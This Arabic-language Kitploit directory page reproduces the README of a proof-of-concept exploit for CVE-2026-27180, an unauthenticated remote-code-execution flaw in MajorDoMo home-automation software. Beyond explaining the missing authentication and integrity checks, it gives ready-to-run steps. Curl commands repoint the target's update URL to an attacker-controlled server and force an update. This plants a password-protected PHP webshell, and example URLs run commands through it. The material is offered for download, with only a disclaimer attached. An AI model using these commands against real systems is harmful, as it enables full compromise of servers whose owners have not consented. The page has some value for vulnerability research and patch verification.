Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mbanyamer/cve-2026-27180-majordomo-unauthenticated-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubmbanyamer/cve-2026-27180-majordomo-unauthenticated-rce

CVE-2026-27180-MajorDoMo-unauthenticated-RCE

إثبات مفهوم لاستغلال CVE-2026-27180، وهو ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) غير مصادق عليها في MajorDoMo عبر تسميم عنوان التحديث، مما يؤدي إلى تسليم قشرة ويب إلى جذر الويب.

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

MajorDoMo RCE (CVE-2026-27180)

Author Python License: MIT CVE-2026-27180 Exploit Type

تنفيذ كود عن بُعد غير مصادق عليه عبر تسميم رابط التحديث في MajorDoMo

CWE-494 – تنزيل كود بدون فحص التكامل
الأثر: اختراق كامل للخادم عبر وضع webshell في جذر الويب
المصادقة المطلوبة: لا شيء
التصحيح: PR #1177

📜 الوصف

يحتوي هذا المستودع على استغلال إثبات المفهوم لثغرة CVE-2026-27180 – وهي ثغرة حرجة لتنفيذ كود عن بُعد غير مصادق عليه في برنامج MajorDoMo لأتمتة المنازل الذكية.

يمكن للمهاجم:

  • تسميم رابط مصدر التحديث دون مصادقة
  • فرض تحديث يقوم بتنزيل واستخراج ملف tarball خبيث
  • وضع ملفات PHP عشوائية (بما في ذلك webshells) مباشرة في جذر الويب

توجد الثغرة بسبب:

  • عدم وجود فحص مصادقة على وضعي auto_update_settings و force_update
  • عدم وجود تحقق من شهادة TLS (CURLOPT_SSL_VERIFYPEER = false)
  • عدم وجود فحص توقيع / تكامل على حزم التحديث التي يتم تنزيلها
  • يتم نسخ الملفات المستخرجة بشكل متكرر إلى جذر المستندات

🛠️ الميزات

  • سكربت Python متكامل (لا يحتاج ملفات خارجية)
  • توليد Atom feed خبيث + tarball في الذاكرة
  • webshell متعدد الطرق محمي بكلمة مرور (poc.php)
  • ملف .htaccess اختياري لفرض تنفيذ PHP
  • مخرجات وحدة تحكم نظيفة مع أوامر نسخ ولصق

🚀 التثبيت

root@kitploit:~
git clone https://github.com/YOUR-USERNAME/majordomo-cve-2026-27180-exploit.git
cd majordomo-cve-2026-27180-exploit
# لا حاجة لتثبيت pip – يستخدم فقط المكتبة القياسية + argparse

📊 مخطط تدفق هجوم PoC

root@kitploit:~
graph TD
    A["Attacker starts malicious HTTP server\nserving /master.xml + /archive/master.tar.gz"] --> B["Attacker poisons update URL\nvia GET /objects/?module=saverestore&mode=auto_update_settings\n&set_update_url=http://attacker:8080"]
    B --> C["Attacker triggers update\nGET /objects/?module=saverestore&mode=force_update"]
    C --> D["MajorDoMo fetches poisoned Atom feed"]
    D --> E["Downloads malicious master.tar.gz\n(CURLOPT_SSL_VERIFYPEER=false)"]
    E --> F["Extracts tar.gz with tar xzvf ..."]
    F --> G["copyTree() copies files recursively\n→ poc.php & .htaccess land in web root"]
    G --> H["Attacker accesses webshell\nhttp://target/poc.php?pass=ChangeMe123&cmd=id"]

    style A fill:#f9d5e5,stroke:#333,stroke-width:2px
    style H fill:#c3e6cb,stroke:#333,stroke-width:2px

🖥️ الاستخدام

شغّل الخادم الخبيث:

root@kitploit:~
python3 exploit.py http://192.168.1.50:80 --lhost 192.168.1.100 --lport 8080

بعد بدء الخادم، نفّذ هذه الأوامر ضد الهدف:

root@kitploit:~
# 1. تسميم مصدر التحديث
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=auto_update_settings&set_update_url=http://192.168.1.100:8080'

# 2. تشغيل التحديث القسري
curl 'http://192.168.1.50:80/objects/?module=saverestore&mode=force_update'

انتظر من 10 إلى 90 ثانية، ثم اختبر الـ webshell:

root@kitploit:~
# أمثلة:
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=id
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=whoami
http://192.168.1.50/poc.php?pass=ChangeMe123&cmd=uname%20-a

⚠️ إشعار قانوني وأخلاقي

يُقدَّم هذا الكود لأغراض تعليمية صارمة، واختبارات أمنية مصرح بها، وأنشطة الفريق الأحمر.

  • لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.
  • قد ينتهك الاستخدام غير المصرح به قوانين بما في ذلك قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) وما يعادله حول العالم.
  • المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الكود.

📄 الترخيص

رخصة MIT

حقوق النشر © 2026 Mohammed Idrees Banyamer

يُمنح الإذن مجانًا لأي شخص يحصل على نسخة من هذا البرنامج والملفات المرتبطة به ("البرنامج") للتعامل مع البرنامج دون قيود، بما في ذلك دون حصر حقوق الاستخدام والنسخ والتعديل والدمج والنشر والتوزيع والترخيص من الباطن و/أو بيع نسخ من البرنامج، والسماح للأشخاص الذين يُقدَّم لهم البرنامج بذلك، وفقًا للشروط التالية:

يجب تضمين إشعار حقوق النشر أعلاه وإشعار الإذن هذا في جميع النسخ أو الأجزاء الجوهرية من البرنامج.

يُقدَّم البرنامج "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق والملاءمة لغرض معين وعدم الانتهاك. في أي حال من الأحوال لا يكون المؤلفون أو أصحاب حقوق النشر مسؤولين عن أي مطالبة أو أضرار أو مسؤولية أخرى، سواء في إطار عقد أو ضرر أو غير ذلك، تنشأ عن أو بسبب أو فيما يتعلق بالبرنامج أو الاستخدام أو التعاملات الأخرى في البرنامج.

تنزيل الأداة